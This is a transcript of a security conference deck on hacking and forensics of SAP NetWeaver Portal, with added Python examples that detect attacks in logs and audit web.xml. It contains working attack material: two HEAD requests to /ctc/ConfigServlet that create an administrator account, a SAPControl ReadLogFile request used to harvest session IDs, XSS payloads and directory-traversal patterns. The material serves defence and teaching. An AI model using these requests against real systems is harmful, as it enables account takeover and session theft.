Invest in security to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin – Director of SAP pentest/research team
Evgeny Neyolov – Security analyst, (anti)forensics research

Posted on 07-Apr-2020


TRANSCRIPT

Page 1: SAP Portal: Hacking and forensics

Invest in security to secure investments

SAP Portal: Hacking and forensics
Dmitry Chastukhin – Director of SAP pentest/research team
Evgeny Neyolov – Security analyst, (anti)forensics research

Page 2

ERPScan

Leading SAP AG partner in discovering security vulnerabilities, by the number of vulnerabilities found

• Developing software for SAP security monitoring

• Talks at 35+ security conferences worldwide: BlackHat (US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.

• First to develop software for NetWeaver J2EE assessment

• The only solution to assess all areas of SAP security

• Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge in SAP research.

erpscan.com ERPScan — invest in security to secure investments

Page 3

Dmitry Chastukhin

Business application security expert

Yet another security researcher

Page 4

Agenda

• SAP security

• SAP forensics WTF?!

• Say hello to SAP Portal

• Breaking SAP Portal

• Catch me if you can

• Conclusion

Page 5

SAP

• The most popular business application

• More than 180000 customers worldwide

• More than 70% of Forbes 500 run SAP

• More than 40% of ERP market in Poland

Page 6

SAP security

Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing supplier and customer lists
• Stealing HR data

Fraud
• False transactions
• Modification of master data

Sabotage
• Denial of service
• Modification of financial reports
• Access to the technology network (SCADA) through trust relations

Page 7

SAP security

[Chart: SAP security by year, 2003 to 2013 (y-axis 0 to 35); series: BlackHat, Defcon, HITB, RSA, CONFidence, DeepSec, Hacktivity, Troopers, Source]

Source: SAP Security in Figures 2013

Page 8

How easy? SAP Security Notes

More than 2600 SAP Security Notes in total

Page 9

Is it remotely exploitable?

> 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SapHostControl, etc.

Source: sapscan.com

Page 10

What about other services?

[Chart: exposed instances of SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate and SAP Message Server httpd; series: World; y-axis 0 to 9]

Page 11

What about unpublished threats?

• Companies are not interested in publishing information about their breaches

• There are a lot of internal breaches thanks to unnecessarily given authorizations (An employee by mistake buys hundreds of excavators instead of ten)

• There are known stories about backdoors left by developers in custom ABAP code

• How can you be sure that, if a breach occurs, you can find evidence?

Page 12

SAP Forensics

Seeing no attacks doesn't mean there were none:

• Companies don't like to share breach information
• Only ~10% of companies use the security audit log
• Even where it is enabled, only ~5% manage it
• Even where it is managed, only ~1% correlate it with other logs

Page 13

Typical SAP audit options (share of companies with each one enabled*)

• ICM HTTP log (icm/HTTP/logging_0): 70%
• Security audit log in ABAP: 10%
• Table access logging (rec/client): 4%
• Message Server log (ms/audit): 2%
• SAP Gateway access log: 2%

* The percentages are based on our security assessments and product implementations.

Page 14

What do we see?

• A lot of research

• Real attacks

• Lack of logging practice

• Many vulnerabilities are hard to close → We need to monitor them, at least

Page 15

What do we need to monitor? External attacks on SAP

Attack vector                   | What to do about it
Attacks on users and SAP GUI    | Awareness
SAP Portal and web              | Too many issues and custom configuration; can be 0-days; need to concentrate on this area
Exposed SAP services            | Disable them
SAProuter                       | Secure configuration and patch management

* Ideally, we should control everything, but this talk has limits, so let's focus on the most critical areas.

Page 16

Say hello to Portal

• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet

Page 17

EP architecture

Page 18

Okay, okay. SAP Portal is important, and it has many links to other modules.

So what?

Page 19

SAP Logging

“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).”

SOURCE: SAP HELP

* Not the only drawback: a CLF log records only the request line, and many complex attacks are carried in POST bodies, so following this advice loses both the user and the payload.

Page 20

SAP J2EE Logging

• Categories of system events recorded:
  – System – all system-related security and administrative logs
  – Applications – all system events related to business logic
  – Performance – reserved for single activity tracing

• Default location of these files in your file system: \usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\

Page 21

SAP J2EE Logging

• The developer trace files of the Java instance: <SID>\<instance name>\work
• The developer trace files of the central services: <SID>\<instance name>\work and <SID>\<instance name>\log
• Java server logs: <SID>\<instance name>\j2ee\cluster\server<n>\log

Page 22

Full logging is not always the best option

Page 23

SAP Management Console

Page 24

SAP Management Console

• SAP MMC: centralized system management
• SAP MMC has remote commands, served by the SAPControl SOAP interface of the sapstartsrv process
• Commands are simple SOAP requests
• They allow you to read the trace and log messages
• It's not bad if you only use it sometimes and delete the logs after use, but…

Page 25

SAP Management Console

What can we find in the logs?

Right! The file userinterface.log contains the calculated JSESSIONID of logged-in users, i.e. a valid session that can be replayed.

But… the attacker must have credentials to read the log file.

WRONG!

Page 26

SAP Management Console

The SAPControl ReadLogFile request that returns the log; %COUNT% is the number of entries to return:

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
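An added example, not code from the deck or from SAP: it builds the ReadLogFile envelope above with the placeholder filled in and scans whatever a sapstartsrv returns for JSESSIONID values, which is the quickest way to confirm whether your own userinterface.log leaks sessions. Assumptions of mine: the SAPControl endpoint is reached on port 5<NN>13 over HTTP, where NN is the instance number; the `SOAPAction` header value; and the sample response, which is constructed and not a real log.

```python
"""Build the SAPControl ReadLogFile request from the slide and look for leaked
session identifiers in the answer. Added example; not part of the deck."""
import re
import urllib.request
from xml.sax.saxutils import escape

SAPCONTROL_NS = "urn:SAPControl"
USERINTERFACE_LOG = "j2ee/cluster/server0/log/system/userinterface.log"


def build_read_log_request(filename: str, maxentries: int, statecookie: str = "EOF") -> str:
    """The envelope from the slide, with %COUNT% replaced by a real number."""
    return (
        '<?xml version="1.0"?>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
        ' xmlns:xs="http://www.w3.org/2001/XMLSchema">'
        "<SOAP-ENV:Header>"
        '<sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">'
        "<enableSession>true</enableSession></sapsess:Session></SOAP-ENV:Header>"
        "<SOAP-ENV:Body>"
        f'<ns1:ReadLogFile xmlns:ns1="{SAPCONTROL_NS}">'
        f"<filename>{escape(filename)}</filename><filter/><language/>"
        f"<maxentries>{int(maxentries)}</maxentries>"
        f"<statecookie>{escape(statecookie)}</statecookie>"
        "</ns1:ReadLogFile></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


# The session id format in J2EE logs varies, so match up to the next delimiter
# rather than a guessed shape; case-insensitive because path parameters are lower-case.
SESSION_ID = re.compile(r"JSESSIONID=([^\s;,&\"'<]+)", re.IGNORECASE)


def find_session_ids(log_text: str) -> list:
    """Distinct JSESSIONID values in the text, in order of first appearance."""
    seen = []
    for match in SESSION_ID.finditer(log_text):
        if match.group(1) not in seen:
            seen.append(match.group(1))
    return seen


def read_log_remote(host: str, instance: str, filename: str = USERINTERFACE_LOG,
                    maxentries: int = 500, timeout: int = 10) -> str:
    """Send the request to sapstartsrv (assumed port 5<NN>13). Only for systems
    you are authorised to test; the SOAPAction value is an assumption."""
    url = f"http://{host}:5{instance}13/"
    body = build_read_log_request(filename, maxentries).encode()
    req = urllib.request.Request(url, data=body, headers={
        "Content-Type": "text/xml; charset=utf-8", "SOAPAction": '""'})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed sample of a response body containing two leaked sessions; not real data.
SAMPLE_RESPONSE = """<item>2013 04 03 01:30:01:000</item><item>Info</item>
<item>Session JSESSIONID=(J2EE4711)ID0000000001DB00000000000000000000000End created for user Administrator</item>
<item>Request path parameter jsessionid=(J2EE4711)ID0000000002DB00000000000000000000000End</item>"""

if __name__ == "__main__":
    print(build_read_log_request(USERINTERFACE_LOG, 50))
    print(find_session_ids(SAMPLE_RESPONSE))
```

If `find_session_ids(read_log_remote(host, "00"))` returns anything on a system where you have not authenticated to sapstartsrv, the prevention steps on the next slide apply to you.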

Page 27

Prevention

Source: SAP Help

• Don't use TRACE_LEVEL = 3
• Delete traces when work is finished
• Limit access to dangerous methods
• Install notes 927637 and 1439348
• Mask security-sensitive data in the HTTP access log

Page 28

Prevention

Source: SAP Help

• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
• By default, only the items listed below are masked:
  – Path parameter: jsessionid
  – Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
  – HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
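An added example, not the HTTP Provider's own masking code: it applies the default list above to access-log lines (for instance before shipping them to a SIEM) and makes visible what the defaults leave alone. The ctc line is the one from the investigation slide later in the deck; the login, cookie and Authorization lines are constructed samples with made-up values.

```python
"""Mask the default sensitive items from the slide in access-log lines.
Added example; not SAP code. Sample lines other than the ctc one are constructed."""
import re

MASK = "***"
# The default list from the slide.
PATH_PARAMS = ("jsessionid",)
REQUEST_PARAMS = ("j_password", "j_username", "j_sap_password", "j_sap_again",
                  "oldPassword", "confirmNewPassword", "ticket")
COOKIES = ("JSESSIONID", "MYSAPSSO2")
HEADERS = ("Authorization",)


def _param_re(names):
    """name=value where the name starts a parameter (after ? & ; , or a space)."""
    alt = "|".join(re.escape(n) for n in names)
    return re.compile(rf"(?i)(?<![\w.-])({alt})=([^&;,\s\"']*)")


def mask_line(line: str, extra_params=()) -> str:
    """Return the line with path parameters, query parameters, cookies and
    headers from the lists masked. extra_params extends the query-parameter list."""
    path_alt = "|".join(PATH_PARAMS)
    masked = re.sub(rf"(?i);({path_alt})=[^;/?#\s]*", rf";\1={MASK}", line)
    masked = _param_re(REQUEST_PARAMS + tuple(extra_params)).sub(rf"\1={MASK}", masked)
    cookie_alt = "|".join(COOKIES)
    masked = re.sub(rf"\b({cookie_alt})=[^;\s\"']*", rf"\1={MASK}", masked)
    header_alt = "|".join(HEADERS)
    masked = re.sub(rf"(?i)\b({header_alt}):\s*[^\r\n\"']*", rf"\1: {MASK}", masked)
    return masked


# From the deck's responses.trc slide: the attacker's chosen password is a
# parameter named PASSWORD, which is not on the default list.
CTC_LINE = ("[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param="
            "com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0")
# Constructed samples.
LOGIN_LINE = ("[Apr 3, 2013 1:31:07 AM ] - 192.168.192.14 : POST "
              "/irj/portal;jsessionid=(J2EE4711)ID01End?j_username=admin&j_password=Secret1 HTTP/1.1 200 512")
COOKIE_LINE = "Cookie: JSESSIONID=(J2EE4711)ID01End; MYSAPSSO2=AjExMDAgABEwOjAwOjAw; sap-usercontext=sap-client=001"
AUTH_LINE = "Authorization: Basic YWRtaW46U2VjcmV0MQ=="

if __name__ == "__main__":
    for sample in (CTC_LINE, LOGIN_LINE, COOKIE_LINE, AUTH_LINE):
        print(mask_line(sample))
    print(mask_line(CTC_LINE, extra_params=("password",)))
```

The default list masks the portal's own login form fields and the two SSO cookies, nothing more. That is the right trade-off for forensics (the ctc line keeps its full parameter string, which is what convicts it), but any application that puts secrets in its own parameter names needs them added, as `extra_params` does here.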

Page 29

SAP NetWeaver J2EE

Page 30

Access Control

• Web Dynpro – programmatic (by UME)
• Portal iViews – programmatic (by UME)
• J2EE web apps – declarative (by web.xml)

Page 31

Access Control

• The central entity in the J2EE authorization model is the security role
• Programmers define the application-specific roles in the J2EE deployment descriptors: web.xml and web-j2ee-engine.xml

Page 32

web.xml

  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>

Verb Tampering: the constraint names only GET, so only GET requests to /admin/* are restricted; every other method is left unconstrained.

Page 33

Verb Tampering

• If we try to access the application using GET, we need a login:pass and the administrator role
• What if we access the application using HEAD instead of GET? The constraint doesn't list HEAD, so no authentication is required, and the servlet's default doHead() runs the same code as doGet() and just drops the response body
• PROFIT!
• Did U know about ctc?

Page 34

Verb Tampering

Need an admin account in SAP Portal? Just send two HEAD requests.

• Create a new user CONF with the password idence:

  HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence

• Add the user CONF to the group Administrators:

  HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators

* Works when UME uses the Java database as its data source.

Page 35

Prevention

• Install SAP notes 1503579, 1616259, 1589525, 1624450
• Install the other SAP notes about Verb Tampering
• Scan applications with the ERPScan WEB.XML checker
• Disable the applications that are not necessary

Page 36

Investigation

From j2ee\cluster\<node>\log\system\httpaccess\responses.trc:

[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0

The tell: the same client gets 401 for GET and, minutes later, 200 for HEAD on the same servlet, and the ConfigServlet parameter string is written to the log in full.

Page 37

web.xml, fixed for verb tampering by listing HEAD as well:

  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>HEAD</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>

GET /admin/critical/CriticalAction – covered by the constraint
GET /servlet/com.sap.admin.Critical.Action – the invoker servlet calls the class by name under /servlet/, a path the /admin/* pattern never matches

Invoker servlet
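An added example, neither the ERPScan WEB.XML checker nor SAP code: a descriptor audit for the two problems the web.xml slides show. A security-constraint that lists http-method elements protects only those methods (verb tampering), and with the invoker servlet enabled every servlet is also reachable as /servlet/<class>, which the constraint's url-pattern does not cover. Whether the invoker is enabled lives in engine configuration (EnableInvokerServletGlobally), not in web.xml, so that part is reported as an exposure to verify rather than a confirmed hole. The descriptor below is the slide's, made well-formed; the "fixed" variant is my assumption of what the corrected constraint looks like (no http-method list, so all methods are constrained).

```python
"""Audit a web.xml for verb-tampering and invoker-servlet exposure.
Added example; not the ERPScan checker and not SAP code."""
import xml.etree.ElementTree as ET

# The deck's descriptor, fixed to be well-formed.
SLIDE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>"""

# Assumed fix: drop the method list so the constraint applies to every method.
FIXED_WEB_XML = SLIDE_WEB_XML.replace("      <http-method>GET</http-method>\n", "")

COMMON_METHODS = ("GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE")


def _strip_ns(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]


def _children(elem, name: str):
    """Direct children with the given local name, namespace-agnostic."""
    return [c for c in elem if _strip_ns(c.tag) == name]


def _pattern_matches(pattern: str, path: str) -> bool:
    """Servlet-spec url-pattern matching: exact, path prefix (/x/*) or extension (*.ext)."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern


def audit_web_xml(xml_text: str) -> list:
    root = ET.fromstring(xml_text)
    findings = []
    protected = []  # (url-patterns, listed methods) of constraints that demand a role
    for sc in _children(root, "security-constraint"):
        if not _children(sc, "auth-constraint"):
            continue  # no auth-constraint: nothing is required, so nothing to bypass
        patterns, methods = [], []
        for wrc in _children(sc, "web-resource-collection"):
            patterns += [p.text.strip() for p in _children(wrc, "url-pattern")]
            methods += [m.text.strip().upper() for m in _children(wrc, "http-method")]
        protected.append((patterns, methods))
        if methods:  # listing methods restricts only those methods
            findings.append({"type": "verb-tampering", "patterns": patterns, "listed": methods,
                             "unrestricted": [m for m in COMMON_METHODS if m not in methods]})
    for servlet in _children(root, "servlet"):
        cls = _children(servlet, "servlet-class")
        if not cls:
            continue
        path = "/servlet/" + cls[0].text.strip()
        if not any(_pattern_matches(p, path) for pats, _ in protected for p in pats):
            findings.append({"type": "invoker-servlet", "path": path})
    return findings


if __name__ == "__main__":
    for f in audit_web_xml(SLIDE_WEB_XML):
        print(f)
```

On the slide's descriptor the audit reports both problems; on the variant without a method list it still reports the invoker path, which is the point of slide 37: adding HEAD fixes one bypass and leaves the other.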

Page 38

Invoker Servlet

• Want to execute an OS command on the J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?

Still remember ctc?

Page 39

Invoker Servlet

Page 40

Prevention

• Update to the latest patches: SAP notes 1467771, 1445998
• “EnableInvokerServletGlobally” must be “false”
• Check all WEB.XML files with the ERPScan WEBXML checker

Page 41

Investigation

Two records from the J2EE security audit log (fields separated by #). The first shows the Guest user, i.e. an unauthenticated caller, creating user CONF through the ctc application; the second shows the role check that admitted that caller as a member of guests:

#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#

#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
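An added example, not from the deck: a parser for the two audit records above and a rule that raises on user administration performed by the Guest user. The field positions (version, id, timestamp in ms, category, application, location, user, ..., severity, logger, message kind, message) are read off the records on the slide, not taken from a documented schema, so treat the column numbers as an assumption; the "Java" kind, where the message is a template followed by an argument count and the arguments, is likewise inferred from the second record. The action prefixes other than USER. are assumptions too.

```python
"""Parse #-separated J2EE audit records and flag user administration by Guest.
Added example; field layout inferred from the two records on the slide."""
from datetime import datetime, timezone

RECORD_CREATE = (
    "#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#"
    "sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#"
    "SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#"
    "SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#"
    "Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#")
RECORD_ROLE = (
    "#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#"
    "sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##"
    "0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##"
    "0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller "
    "assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#")


def parse_j2ee_record(record: str) -> dict:
    """Split one record; column numbers are an assumption read off the slide."""
    fields = record.strip().strip("#").split("#")
    if len(fields) < 23 or fields[0] != "1.5":
        raise ValueError("unexpected record layout")
    kind = fields[19]
    if kind == "Java":
        # template, then the number of arguments, then the arguments themselves
        n = int(fields[23])
        message = fields[22].format(*fields[24:24 + n])
    else:
        message = fields[22]
    return {
        "time": datetime.fromtimestamp(int(fields[2]) / 1000, tz=timezone.utc),
        "category": fields[3],
        "application": fields[4],
        "location": fields[5],
        "user": fields[6],
        "severity": fields[16],
        "kind": kind,
        "message": message,
    }


# Prefixes of UME audit actions; USER. is on the slide, the others are assumptions.
ADMIN_ACTIONS = ("USER.", "GROUP.", "ROLE.")


def find_guest_user_admin(records, users=("Guest",)) -> list:
    """Audit entries where a low-privilege principal performed an administration action."""
    alerts = []
    for rec in records:
        r = parse_j2ee_record(rec)
        if r["user"] not in users or r["kind"] != "Plain":
            continue
        if not r["category"].startswith("/System/Security/Audit"):
            continue
        parts = [p.strip() for p in r["message"].split("|")]  # actor | action | target | ...
        if len(parts) >= 3 and parts[1].startswith(ADMIN_ACTIONS):
            alerts.append({"time": r["time"], "application": r["application"],
                           "action": parts[1], "target": parts[2]})
    return alerts


if __name__ == "__main__":
    for a in find_guest_user_admin([RECORD_CREATE, RECORD_ROLE]):
        print(a)
```

The rule keys on the principal, not on the application: a user created by an administrator through the normal UME screens produces the same USER.CREATE line, and it is the Guest actor in the first record that turns it into an alert.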

Page 42

Investigation

Page 43

XSS

• Many XSSs in Portal
• But sometimes the session cookie is HttpOnly, so plain cookie theft from script fails
• But when we exploit XSS, we can use the features of SAP Portal: EPCF

Page 44

EPCF

• EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object; for example, EPCF is used as a transient user data buffer for iViews, and an injected script can read that buffer:

  <SCRIPT>
    alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
  </SCRIPT>

Page 45

Prevention

• Install SAP note 1656549

Page 46

Investigation

From j2ee\cluster\<node>\log\system\httpaccess\responses.trc:

#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#

URL-decoded, the systemid parameter reads MS_EXCHANGEaaaa</script><script>alert('xSS')</script>: a reflected payload in a GET parameter is visible in the access log, unlike one delivered in a POST body.

Page 47

Web Dynpro JAVA

• Web Dynpro unauthorized modifications
• For example:
  – somebody steals an account using XSS/CSRF/sniffing
  – then tries to modify the severity level of the logs

Page 48

Web Dynpro JAVA

Source: SAP Help

Page 49

Investigation

• No traces of the change in the default log file \cluster\server0\log\system\httpaccess\responses.log
• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
• But sometimes we can find information by indirect signs:

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110

• The client loaded images from the server during the change: the warning icon of the log configurator application gives away which Web Dynpro screen was used

Page 50

Investigation

• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don't have them, so they make requests to the server
• That's how we can identify potentially malicious actions
• But there should be correlation with a real user's activity
• False positives are possible:
  – New legitimate user
  – Old user clears cache
  – Other

Page 51

Directory traversal

FIX

Page 52

Directory traversal fix bypass

Page 53

Prevention

• Install SAP note 1630293

Page 54

Investigation

Patterns to search for in the access log:

/../
!252f..!252f

The second is the double-encoded form of the first: the portal writes ! in place of % in its URL encoding (compare pcd!3aportal_content!2f… on slide 68), so !252f is %252f, which decodes to %2f and then to /. Search for both forms, not just the plain one.
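An added example, not from the deck: one pass over responses.trc that applies the indicators from the investigation slides together, i.e. slide 36 (ctc ConfigServlet calls and the GET-401-then-HEAD-200 verb-tampering pattern), slide 46 (a script tag in a GET parameter), slides 49 and 50 (resources of the log configurator being fetched) and this slide (plain and double-encoded traversal, with the portal's ! written for %). The first five sample lines are the ones printed in the deck; the last line is constructed, and its component name and file values are made up.

```python
"""Scan responses.trc lines for the indicators on the investigation slides.
Added example; the last sample line is constructed."""
import re
from urllib.parse import unquote

# One entry. The timestamp prefix is optional so the "#Plain###<ip> : ..." form parses too.
LINE = re.compile(
    r"(?:\[(?P<ts>[^\]]*)\]\s*-\s*)?(?:#\w+###)?"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*:\s*(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+"
    r"HTTP/\d\.\d\s+(?P<status>\d{3})\s+(?P<size>\d+)")

XSS = re.compile(r"<\s*/?\s*script|javascript:", re.IGNORECASE)
TRAVERSAL = re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")


def parse_line(raw: str):
    m = LINE.search(raw)
    if not m:
        return None
    e = m.groupdict()
    e["status"], e["size"] = int(e["status"]), int(e["size"])
    return e


def decode_url(url: str, rounds: int = 3) -> str:
    """Undo the portal's !-for-% encoding, then percent-decode until stable."""
    s = url.replace("!", "%")
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def analyze(log_text: str) -> list:
    findings, denied = [], {}
    for raw in log_text.splitlines():
        e = parse_line(raw)
        if not e:
            continue
        path = e["url"].split("?", 1)[0]
        decoded = decode_url(e["url"])
        key = (e["ip"], path)
        # Verb tampering: the same client was refused with GET and then let in with another method.
        if e["method"] == "GET" and e["status"] in (401, 403):
            denied[key] = e["status"]
        elif e["method"] != "GET" and e["status"] == 200 and key in denied:
            findings.append({"type": "verb-tampering", "ip": e["ip"], "path": path, "method": e["method"]})
        # ctc ConfigServlet: the parameter string is class;ACTION;arguments.
        if path.endswith("/ctc/ConfigServlet") and "param=" in e["url"]:
            parts = e["url"].split("param=", 1)[1].split(";")
            findings.append({"type": "ctc-configservlet", "ip": e["ip"],
                             "action": parts[1] if len(parts) > 1 else ""})
        if XSS.search(decoded):
            findings.append({"type": "xss-probe", "ip": e["ip"], "url": e["url"]})
        if TRAVERSAL.search(decoded):
            findings.append({"type": "traversal", "ip": e["ip"], "decoded": decoded})
        # Indirect sign from slides 49/50: icons of the log configurator being fetched.
        if "tc~lm~webadmin~log_config" in path:
            findings.append({"type": "log-config-ui", "ip": e["ip"], "resource": path.rsplit("/", 1)[-1]})
    return findings


SAMPLE_LOG = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Mar 20, 2013 9:40:12 AM ] - 172.16.0.63 : GET /irj/servlet/prt/portal/prtroot/com.example.FileView?file=!252f..!252f..!252fusr!252fsap!252fTTT HTTP/1.1 200 812
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

The log-config-ui finding is the weak one: on its own it is a user opening the log configurator, and it only becomes interesting when no known administrator was active from that address at that time, which is the correlation slide 50 asks for.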

Page 55

Breaking SAP Portal

• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB

